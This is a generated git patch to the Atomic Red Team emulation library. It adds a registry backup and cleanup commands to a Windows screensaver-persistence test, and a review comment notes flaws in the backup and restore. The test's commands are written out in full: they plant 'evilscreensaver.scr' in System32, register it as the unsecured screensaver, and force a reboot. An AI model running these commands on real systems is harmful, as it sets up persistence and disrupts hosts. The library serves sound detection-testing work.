From 9c46e34eb0a237c0879ba3dc2ef72ecee4339d6e Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Wed, 13 Jul 2022 16:55:34 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/index.yaml | 10 ++++++++++
 atomics/T1546.002/T1546.002.md | 7 +++++++
 2 files changed, 17 insertions(+)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 69c112de..7d1079ce 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -37469,12 +37469,17 @@ privilege-escalation:
 default: C:\Windows\System32\cmd.exe
 executor:
 command: |
+ reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
 shutdown /r /t 0
+ cleanup_command: |
+ reg import %userprofile%\backup.reg
+ del %userprofile%\backup.reg
+ del %SystemRoot%\System32\evilscreensaver.scr
 name: command_prompt
 elevation_required: true
 T1543.001:
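Review bot: The added `reg export` line has no `/y`, so when `%userprofile%\backup.reg` is still present from an earlier run (likely, because the test ends with `shutdown /r /t 0` before any cleanup can run) the command stops on an overwrite prompt and the executor hangs instead of saving the backup. The new cleanup then depends on `reg import`, which merges the values in the file but does not remove values that were absent at export time, so on a host where `SCRNSAVE.EXE` or the other three values were not set before, the key presumably still points at the deleted screensaver after cleanup; either delete those values explicitly in `cleanup_command` or document that the import is only a partial restore. Suggest `reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg /y`. The same lines recur in the second index.yaml hunk and in both T1546.002.md hunks, and since these files are generated the fix belongs in the source atomic definition rather than here.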
@@ -59611,12 +59616,17 @@ persistence:
 default: C:\Windows\System32\cmd.exe
 executor:
 command: |
+ reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
 shutdown /r /t 0
+ cleanup_command: |
+ reg import %userprofile%\backup.reg
+ del %userprofile%\backup.reg
+ del %SystemRoot%\System32\evilscreensaver.scr
 name: command_prompt
 elevation_required: true
 T1543.001:
diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md
index 256d30c1..7105d9b4 100644
--- a/atomics/T1546.002/T1546.002.md
+++ b/atomics/T1546.002/T1546.002.md
@@ -40,6 +40,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
 ```cmd
+reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
@@ -48,6 +49,12 @@ reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ
 shutdown /r /t 0
 ```
+#### Cleanup Commands:
+```cmd
+reg import %userprofile%\backup.reg
+del %userprofile%\backup.reg
+del %SystemRoot%\System32\evilscreensaver.scr
+```